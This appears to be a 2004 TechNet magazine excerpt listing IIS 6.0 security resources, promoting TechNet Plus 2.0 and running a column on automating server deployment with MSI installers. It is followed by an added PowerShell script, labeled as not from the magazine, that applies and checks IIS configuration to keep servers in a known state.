To round out the offerings, a technical paper, "For Developers: Innovations in IIS Security," is the online reprint of a September 2002 MSDN Magazine article titled, "Innovations in Internet Information Services Let You Tightly Guard Secure Data and Server Processes" and amounts to about eight hard copy pages. It covers the use of IIS Lockdown to shut down services when needed, limiting port access with TCP/IP filtering, controlling file serving with extension mapping, new developments in SSL, the use of URLScan, and more. See msdn.microsoft.com/msdnmag/issues/02/09/securityiniis60.




Customer responses to Microsoft-sponsored webcasts have been very positive. While gaining access to these webcasts requires a couple of brief steps, these online seminars are worth the few moments spent logging in. Most webcasts range between 70 and 100 minutes in length and between 8.5 and 13MB in download size.

One of the many webcasts available is Microsoft Executive Circle Webcast: Advanced Web Server Security with IIS 6.0 and Windows Server 2003, by IIS Security Program Manager Vikas Malhotra and IIS MVP Brett Hill, introduced by IIS Product Manager Mary Alice Colvin. Relevant for business and technical personnel, it explains how security improvements in both IIS 6.0 and Windows Server 2003 enable deployment of secure Web servers and reduce costs. See msevents.microsoft.com/cui/Eventdetail.aspx?EventID=1032240294.

Other webcasts dig further into technical detail about IIS 6.0 security features. Starting with a bit of history, Securing IIS 6.0 (presented by Malhotra; about 70 minutes long) covers previous IIS architectures and then reviews the security architecture rebuilt for IIS 6.0, which is locked down by default. It explains how new features, such as fault-tolerant process isolation, help protect against intrusions. See www.microsoft.com/usa/webcasts/ondemand/2103.asp.

Effectively Using IIS Security (Malhotra; 90 minutes) provides an overview of the big picture by reviewing the new IIS 6.0 security architecture before it explores the underlying security principles of IIS 6.0. It also illustrates how the new security features help protect Web servers against hackers. A 7.3MB PDF slide deck, downloadable separately, accompanies this presentation. See msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032241468.

Authentication protocols are the focus of The Ins and Outs of Authentication in IIS 4.0, 5.0, and 6.0—Level 200 (Chris Adams, IIS supportability lead; 85 minutes). This presentation addresses ways to secure IIS servers with good authentication schemes, a critical part of establishing server security, by explaining how anonymous, basic, and other authentication methods work. See www.microsoft.com/usa/webcasts/ondemand/2100.asp.

If you're considering migrating to IIS 6.0 from the 4.0 or 5.0 releases you will want to watch The Inside Scoop: The Good, the Bad, and the Ugly of IIS 5.0 Isolation Mode in IIS 6.0 (Level 300) (Chris Adams, IIS supportability lead; 82 minutes). The presentation focuses on determining which applications implemented on earlier releases of IIS are well suited for immediate migration to IIS 6.0, with its new worker process isolation mode, and which are candidates for running in IIS 5.0 Isolation Mode temporarily while they're updated to take advantage of the new architecture of IIS 6.0. The pitfalls and costs of using IIS 5.0 Isolation Mode on Windows Server 2003 are also discussed. See www.microsoft.com/usa/webcasts/ondemand/2279.asp.

Windows and Exchange administrators and others who have to ensure secure data transmission between clients and Windows and Exchange servers form the primary audience for Troubleshooting Secure Socket Layer (Adams; 90 minutes). This presentation discusses SSL on each supported IIS platform and also lays out some tips and tricks that simplify troubleshooting. See www.microsoft.com/usa/webcasts/ondemand/2099.asp.




Online Security Centers 


Expanding beyond the very specific technical documentation are the two different online security centers included on the TryIIS.com Web site (www.tryiis.com/Security.asp). The first is the Online IIS Security Center (www.microsoft.com/technet/security/prodtech/iis/default.mspx), which provides the latest security updates, troubleshooting advice, configuration and administration guidance, and in-depth information on specific security topics for all versions of IIS Web servers.

Starting at the In-depth Guidance for Securing Computer Systems heading at the IIS Security Center, traversing a few linked pages, and then scanning for IIS reveals the following three items of interest.

• Checklists for configuring the Active Directory IIS server organizational unit structure as well as for hardening the IIS server: www.microsoft.com/technet/security/guidance/secmod216.mspx
• A detailed guide to hardening an IIS server, complete with follow up technical references: www.microsoft.com/technet/security/guidance/secmod124.mspx
• Detailed explanations and step-by-step instructions for running IIS Lockdown: msdn.microsoft.com/library/en-us/secmod/html/secmod113.asp

The second recommended site is the Online Microsoft Security Center (www.microsoft.com/security). While this site is not specifically an IIS 6.0 resource, it does provide a handy central location to keep current on recent viruses, hack attempts, and other security incidents as well as security bulletins, updates, and corporate-level security information.


The e-Business Foundation Winner 


The in-depth emphasis on security in IIS 6.0 might take the surprise out of learning that IIS 6.0 is an eWEEK award winner. In April 2004, eWEEK, a prominent e-business, communications, and Internet-based architecture newsletter, acknowledged the new strength and security of Windows Server 2003 and IIS 6.0. It declared the pair as the winner in the Best e-Business Foundation category, based "on the strength of the components it combines for building an organization's basic IT infrastructure."

The award also singled out the improved security features: "Chief among those was the move to the all-new IIS (Internet Information Services) 6.0 Web server, which is faster, more reliable and more secure than the previous version of IIS. What's more, IIS 6.0 is not installed by default in Windows Server 2003, which reduces unnecessary exposure. In addition, IIS 6.0 is better suited than its predecessor as a development platform target." (Source: www.eweek.com/article2/0,1759,1559921,00.asp)

To look past industry awards, visit the security page on the TryIIS.com Web site (www.tryiis.com/Security.asp) to discover the resources described here, and more. The site lays out in both summary form and technical detail the elements that make Windows Server 2003 and IIS 6.0 meet business and organizational needs for a secure, high-performance Web infrastructure.


Microsoft TechNet Update

New Benefits Deliver More Value to TechNet Plus Subscribers!

Microsoft is committed to delivering a comprehensive, centralized set of resources to help you solve technical problems, plan and deploy Microsoft technologies, and build your skills. To support this, the Microsoft TechNet Plus 2.0 subscription will include a new set of groundbreaking features starting in the fall of 2004. Take a look at what's in store for TechNet Plus 2.0 subscribers:

No more time-bombed software!
Full-version software will replace time-bombed software to provide more flexibility to TechNet Plus 2.0 subscribers conducting evaluations. This enhancement supplies you with a cost-effective solution for trying the latest Microsoft technologies.

TechNet Plus 2.0 subscribers receive beta software automatically so that they can spend more time cultivating skills on upcoming Microsoft products. Keeping new software skills fresh and up to date gives you a competitive advantage when you're creating cutting-edge solutions.

Enhanced technical support options
TechNet Plus 2.0 provides a range of support choices to help solve technical problems fast. The improved TechNet support offering has been developed in response to customer feedback, highlighting the Microsoft commitment to addressing customer needs. New TechNet Plus 2.0 subscriber support benefits include:

• Complimentary technical support incidents to help you save time resolving mission-critical issues. Two complimentary phone or online support incidents included with each TechNet Plus 2.0 subscription deliver access to a team of world-class professionals who will help provide the best solution possible.
• Discounted professional phone incidents for supported Microsoft software will also be available to TechNet Plus 2.0 subscribers to ensure that there is a resource available to address your technical questions.
• Unlimited technical assistance in managed newsgroups. TechNet Plus 2.0 subscribers will get enhanced levels of service in Managed Newsgroups by guaranteeing a next business day response in more than 90 IT-related public newsgroups. This service allows you to tap the vast pool of knowledge and experience Microsoft support professionals have to offer. You can browse other posts and exchange information with peers and members of the Microsoft MVP community. Or, you can even post a question and receive an answer tailored to your specific problem.

More learning resources
TechNet subscriptions will include even more resources to help you sharpen your skills and find answers to questions about Microsoft technologies. Whether you like to install an application and just start using it, tinker in a virtual lab environment, or search through a library of online books, TechNet Plus 2.0 provides the resources to help you hone your skills and be successful with Microsoft technologies.

Updates on CD or DVD every month
Security bulletins, updates, and hotfixes will be delivered on CD or DVD every month to ensure you have vital security resources at your fingertips regardless of Web connectivity or other constraints. This gives you the flexibility to proactively install the latest fixes every month and so you rest assured that the most current security bulletins and updates are always available.

These new benefits will be available beginning in November 2004. For more information on the TechNet subscription, visit www.microsoft.com/technet/subscriptions.


IT and Life Experiences
Andrew Shuman

So here is the situation. You've been here before, a hundred times if not more. Your server worked perfectly, flawlessly serving up Web pages, photos from the company meeting, and departmental memos on cost-cutting measures. Now it hums at you the same as always, but pages are not displaying, password prompts are appearing where they shouldn't, other sites have complete open access when they should be locked down, and "file not found" errors are popping up everywhere. You sit, staring at the machine, feeling like you've lost your puppy. "But it was just working fine" you exclaim. You start the crusade to find out who did this to you: who wounded your pet server.

It turns out everyone has had a hand in it. Janet down the hall needed to run a quick test for some new code. Quentin wanted to compare his settings against your server. Robert tuned the performance configuration to improve his application's data access speed. Now what are you to do? How can you retrieve your most sacred machine from the grave?

Well, I'm happy to say that from the depths of hell comes good advice and good stories on how to protect yourself from harm's way. Invest in properly maintaining a setup application for even your surliest of server components. I realize you're probably looking at this page askance right now. "Setup? For server components? I just copy those files in there and start tweaking settings. Why waste time? Just get the damn thing running." Ah yes, I hear your words, for they are my own. Many times I would have said the same thing to a person, kicked him out of my office, and slammed the door.

However, I have learned the error of my ways. Investing in deployment technology, even for my server-side components, has saved my butt.

My team depends on the Microsoft® Windows® Installer system (MSI files) to handle all sorts of server settings from virtual roots in IIS, to SQL configurations, to Web pages, to security. Anyone who has installed Microsoft Office or SQL Server™ has seen the UI for an MSI, where you can specify folder locations and application settings. For the IT professional wrestling with server components, this is where you can now specify the things that are unique for each topology where you might deploy your bits—for example, which drive to use, the physical server names, the connection to your database, credentials to run services under, and more.

Our deployment code was the first investment we made on the support tools for the MSN® services team. It took one developer about four weeks to upgrade a legacy system, based only on an obsolete installation document, to a fully automated deployment. The biggest problem was convincing the naysayers on our team that it could indeed be accomplished! The costs paid off very quickly by speeding up our deployment time and accuracy. Before the automation, our deployments were sorry affairs conducted in the middle of the night because they took so damn long and were impossible to test beforehand. Friday nights from midnight until 4 A.M. were reserved not for sleep, but for the grueling synchronization of server settings.

After the automation implementation, we had a simple checklist: "Did you run the install script? Yes/No." Our deployments dropped from multiple hours to just minutes. Obviously, there are pains to go through. It is tricky to completely avoid having an installation document, and if you have a complex system, guess what? The deployment will still be complex. We have found time and time again though that the investment pays off and gives us a framework to then bring in new features like zero-downtime deployment to completely minimize customer impact.

The benefits of this investment are huge. Not only do you have a way to bring your servers back to a well-known state after someone stomps on them, but you can now manage testing in a far more predictable fashion. No longer are developers spending gobs of time making various servers work; they can write the deployment code once and then reuse it for testing as well as production. The code pays off again when you do a hardware upgrade, or if you rebuild a machine from the ground up.

I won't go through all the machinations of how to create an MSI as there are far too many great resources out there for you. MSDN® Online is chock full of articles, as is www.installsite.org. InstallShield and Wise offer third-party products to help any developer in creating their setup routines. So deploy and be proud that you did!


Andrew Shuman has been a developer, program manager, writer, and product unit manager at Microsoft for the past 10 years. 
He currently runs a team in MSN responsible for producing the platform for membership services. 
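The well-known-state idea the column describes, as an added example that is not the MSN team's MSI code or anything printed in the magazine: a PowerShell script that takes the topology-specific values an MSI would collect as properties (site, application pool, content drive, the credential the pool runs under), applies them to IIS idempotently, and when rerun with -CheckOnly answers the "Did you run the install script?" question by listing every setting that has drifted from the declared state without changing it. It assumes a Windows Server with the IIS role and the WebAdministration module, which means IIS 7 or later rather than the IIS 6.0 of the column's era; the site, pool, directory names and account are constructed placeholders.

```powershell
# Added example (not the column's or the MSN team's code): declare the well-known
# state of a Web server once, apply it idempotently, and re-run it to detect drift.
# Assumes the IIS role and the WebAdministration module (IIS 7 or later).
# Site, pool, path and account values are constructed placeholders.
[CmdletBinding()]
param(
    # Topology-specific inputs, the values an MSI would collect as properties
    [string]$SiteName     = 'Default Web Site',
    [string]$AppPoolName  = 'MembershipPool',
    [string]$ContentDrive = 'D:',
    [pscredential]$ServiceCredential,        # account the pool should run as
    [switch]$CheckOnly                       # report drift, change nothing
)

Import-Module WebAdministration

# Every setting the deployment owns lives in this table, so the same script
# serves install, test, and rebuilding a box after someone "stomps on" it.
$Desired = @{
    VirtualDirs = @(
        @{ Name = 'photos'; PhysicalPath = "$ContentDrive\content\photos"; Anonymous = $true  }
        @{ Name = 'memos';  PhysicalPath = "$ContentDrive\content\memos";  Anonymous = $false }
    )
}

$drift = New-Object 'System.Collections.Generic.List[string]'

function Ensure-Setting {
    # Records a setting that is out of state and, unless -CheckOnly, runs its fix.
    param([string]$What, [bool]$InDesiredState, [scriptblock]$Fix)
    if ($InDesiredState) { return }
    $script:drift.Add($What)
    if (-not $CheckOnly) { & $Fix }
}

# --- Application pool and the identity it runs under ---------------------------
$poolPath = "IIS:\AppPools\$AppPoolName"
Ensure-Setting "app pool '$AppPoolName' exists" (Test-Path $poolPath) {
    New-WebAppPool -Name $AppPoolName | Out-Null
}
if ((Test-Path $poolPath) -and $ServiceCredential) {
    $pm = (Get-Item $poolPath).processModel
    $ok = ($pm.identityType -eq 'SpecificUser') -and ($pm.userName -eq $ServiceCredential.UserName)
    Ensure-Setting "app pool '$AppPoolName' runs as $($ServiceCredential.UserName)" $ok {
        # The password comes from the credential object at run time; it is never stored in the script.
        Set-ItemProperty -Path $poolPath -Name processModel -Value @{
            identityType = 'SpecificUser'
            userName     = $ServiceCredential.UserName
            password     = $ServiceCredential.GetNetworkCredential().Password
        }
    }
}

# --- Virtual roots: existence, content path, and whether anonymous access is allowed
$authFilter = '/system.webServer/security/authentication/anonymousAuthentication'
foreach ($vd in $Desired.VirtualDirs) {
    $vdPath = "IIS:\Sites\$SiteName\$($vd.Name)"
    Ensure-Setting "vdir '$($vd.Name)' exists" (Test-Path $vdPath) {
        New-Item -ItemType Directory -Path $vd.PhysicalPath -Force | Out-Null
        New-WebVirtualDirectory -Site $SiteName -Name $vd.Name -PhysicalPath $vd.PhysicalPath | Out-Null
    }
    if (-not (Test-Path $vdPath)) { continue }   # still missing: this is a -CheckOnly run

    $current = (Get-Item $vdPath).physicalPath
    Ensure-Setting "vdir '$($vd.Name)' path is $($vd.PhysicalPath) (found $current)" ($current -eq $vd.PhysicalPath) {
        Set-ItemProperty -Path $vdPath -Name physicalPath -Value $vd.PhysicalPath
    }

    # "memos" must prompt for credentials; "photos" may be read anonymously.
    $location = "$SiteName/$($vd.Name)"
    $anon = [bool](Get-WebConfigurationProperty -PSPath 'IIS:\' -Location $location -Filter $authFilter -Name enabled).Value
    Ensure-Setting "vdir '$($vd.Name)' anonymous access is $($vd.Anonymous) (found $anon)" ($anon -eq $vd.Anonymous) {
        Set-WebConfigurationProperty -PSPath 'IIS:\' -Location $location -Filter $authFilter -Name enabled -Value $vd.Anonymous
    }
}

# --- Result: the checklist answer ----------------------------------------------
if ($drift.Count -eq 0) {
    Write-Output "$SiteName matches the well-known state."
} else {
    $label = if ($CheckOnly) { 'DRIFT' } else { 'FIXED' }
    $drift | ForEach-Object { Write-Output "${label}: $_" }
}
```

Run it once with the topology values for a box (`.\Deploy-WebState.ps1 -ContentDrive 'E:' -ServiceCredential (Get-Credential)`) to install, and again with `-CheckOnly` as a scheduled or pre-release check; because every step is a comparison followed by a fix, the same script handles a fresh rebuild, a test server and a production server that Janet, Quentin and Robert have been adjusting, and the drift lines tell you exactly which "password prompt where it shouldn't be" came from a changed setting rather than from the code.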


[Cartoon by Hans Bjordahl: "The Secret Life of the I... Pro". Panel title: UNACCEPTABLE SERVER ARCHITECTURES. Captions: "A string of daisy-chained Black & Decker 'smart toasters.'"; "A Commodore 64 with an Apple Newton interface, a rhesus monkey and a 'Simon.'"; "...roup Policy..."]




